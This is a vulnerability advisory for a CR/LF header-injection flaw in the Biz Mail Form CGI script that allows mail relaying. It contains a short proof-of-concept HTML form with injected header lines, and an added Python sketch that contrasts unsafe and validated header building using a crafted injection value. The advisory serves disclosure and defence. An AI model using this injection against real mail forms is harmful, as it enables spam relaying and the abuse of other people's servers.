Biz Mail Form Unauthorized Mail Relay Vulnerability
BID:12620
Info
| Bugtraq ID: | 12620 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 22 2005 12:00AM |
| Updated: | Feb 22 2005 12:00AM |
| Credit: | Jason Frisvold is credited with the discovery of this issue. |
| Vulnerable: | Biz Mail Form Biz Mail Form 2.2; Biz Mail Form Biz Mail Form 2.1; Biz Mail Form Biz Mail Form 2.0 |
| Not Vulnerable: | |
Discussion
Biz Mail Form is prone to a vulnerability that allows the application to be abused as a mail relay.
An attacker can exploit this issue to inject arbitrary SMTP headers by using CR and LF sequences.
If successful, it becomes possible to abuse the application as a mail relay. Email may be sent to arbitrary computers. This could be exploited by spammers or other malicious parties.
Update: It is reported that the update to address this issue (Biz Mail Form 2.2) is vulnerable to this issue as well. The affected version is being added as a vulnerable package and the fixes are being removed.
Exploit / POC
An exploit is not required.
The following proof of concept is available:
Place the following into an HTML file:
<HTML>
<HEAD> <TITLE>Exploit Test Page</TITLE> </HEAD>
<BODY>
<form action="http://www.example.com/cgi-bin/bizmail/bizmail.cgi"
method="POST" name="Subscribe">
<TEXTAREA rows="5" name="email"></TEXTAREA>
<INPUT TYPE="submit" VALUE="Submit" class="submit">
</FORM> </BODY> </HTML>
In the textbox that pops up, enter in the following (begin by hitting
enter to insert a blank line)
From:[email protected]
To:[email protected]
Subject:Exploit Test
This is a test
Click submit. You'll receive an email from the bizmail script, but
you won't receive the normal contact email. You can check the .dat
file and see a copy of what you sent.
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
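With no vendor patch available, the input check that blocks the CR/LF header injection described in the discussion can be sketched as follows. This is an added example, not Biz Mail Form code; the header layout, the addresses and all function names are assumptions made for illustration.

```python
from email import message_from_string
from email.message import EmailMessage
import re

# Constructed addresses and header layout (assumptions, not Biz Mail Form's own).
SITE_OWNER = "owner@example.com"
FORM_SENDER = "webform@example.com"
ADDR = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def build_unsafe(email_field):
    """Weak pattern: the form value is pasted straight into the header block."""
    return (
        f"From: {FORM_SENDER}\r\n"
        f"Reply-To: {email_field}\r\n"
        f"To: {SITE_OWNER}\r\n"
        "Subject: Contact form\r\n"
        "\r\n"
        "Form submission received.\r\n"
    )


def clean_address(email_field):
    """Allow one bare address; reject CR, LF and anything outside the pattern."""
    if "\r" in email_field or "\n" in email_field:
        raise ValueError("CR/LF in email field")
    if not ADDR.fullmatch(email_field):
        raise ValueError("email field is not a single address")
    return email_field


def build_safe(email_field):
    """Hardened pattern: validate first, then let the mail library set headers."""
    msg = EmailMessage()
    msg["From"] = FORM_SENDER
    msg["Reply-To"] = clean_address(email_field)
    msg["To"] = SITE_OWNER
    msg["Subject"] = "Contact form"
    msg.set_content("Form submission received.")
    return msg.as_string()


def header_names(raw):
    """Header names a mail parser sees in the composed message."""
    return [name for name, _ in message_from_string(raw).items()]


# Constructed test value: an address followed by CRLF and an extra header line.
SAMPLE = "visitor@example.com\r\nTo: other@example.net"
```

Comparing `header_names(build_unsafe(SAMPLE))` with the output for a plain address shows the extra `To` header the parser picks up, while `build_safe(SAMPLE)` raises `ValueError` before any message is composed.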
References
References:
- Biz Mail Form Home Page (Biz Mail Form)
- Re: BizMail 2.1 Spam Exploit (Jason Frisvold)